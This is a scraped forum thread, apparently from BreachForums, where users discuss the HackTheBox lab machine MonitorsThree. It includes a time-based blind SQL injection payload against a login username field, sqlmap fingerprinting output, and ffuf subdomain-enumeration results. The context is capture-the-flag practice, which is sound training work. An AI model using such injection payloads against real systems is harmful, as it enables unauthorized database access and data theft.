[HTB] MonitorsThree
by celsius - Saturday August 24, 2024 at 05:26 PM
#11
there's sqli. Username is injectable.
Reply
#12
Can dump DB with SQLI
Reply
#13
Have you find anything useful?

(Aug 24, 2024, 08:09 PM)bestmajor Wrote: ---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=x' AND (SELECT 2000 FROM (SELECT(SLEEP(5)))GcxH) AND 'DeaG'='DeaG
---
[22:08:29] [INFO] the back-end DBMS is MySQL
[22:08:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Reply
#14
(Aug 24, 2024, 08:12 PM)hexforce Wrote: Can dump DB with SQLI

cant get command working would you mind sharing command

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#15
(Aug 24, 2024, 08:23 PM)teky Wrote:
(Aug 24, 2024, 08:12 PM)hexforce Wrote: Can dump DB with SQLI

cant get command working would you mind sharing command

https://book.hacktricks.xyz/pentesting-w...ion/sqlmap
Reply
#16
lol patched sqli ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#17
SQLI on cacti or website? Not work for me on both Undecided
Reply
#18
(Aug 24, 2024, 08:26 PM)sa1B1B Wrote:
(Aug 24, 2024, 08:23 PM)teky Wrote:
(Aug 24, 2024, 08:12 PM)hexforce Wrote: Can dump DB with SQLI

cant get command working would you mind sharing command

https://book.hacktricks.xyz/pentesting-w...ion/sqlmap

LOL, that was tricky, laughing as a mf xD
Reply
#19
it was patched guys ..

we have another subdomains

:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404
:: Filter : Response size: 13560
________________________________________________

cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
www.marketing [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9981ms]
setup [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9983ms]
rpc [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9986ms]
zeta [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9989ms]
ibank [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9987ms]
helm [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9990ms]
mailgateway [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9978ms]

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#20
(Aug 24, 2024, 08:42 PM)osamy7593 Wrote: it was patched guys ..

we have another subdomains

:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
:: Filter          : Response status: 404
:: Filter          : Response size: 13560
________________________________________________

cacti                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
www.marketing          [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9981ms]
setup                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9983ms]
rpc                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9986ms]
zeta                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9989ms]
ibank                  [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9987ms]
helm                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9990ms]
mailgateway            [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9978ms]

nope, its redirected to main page. You have a bad syntax in ffuf
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,191 2 hours ago
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,495 Yesterday, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 398 Yesterday, 10:36 PM
Last Post: op334
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 369 92,019 Yesterday, 04:10 PM
Last Post: sabbyahmed
  CBBH Write Ups hiddenhacker 22 6,229 Yesterday, 06:39 AM
Last Post: Usercomplex

Forum Jump:


 Users browsing this forum: 1 Guest(s)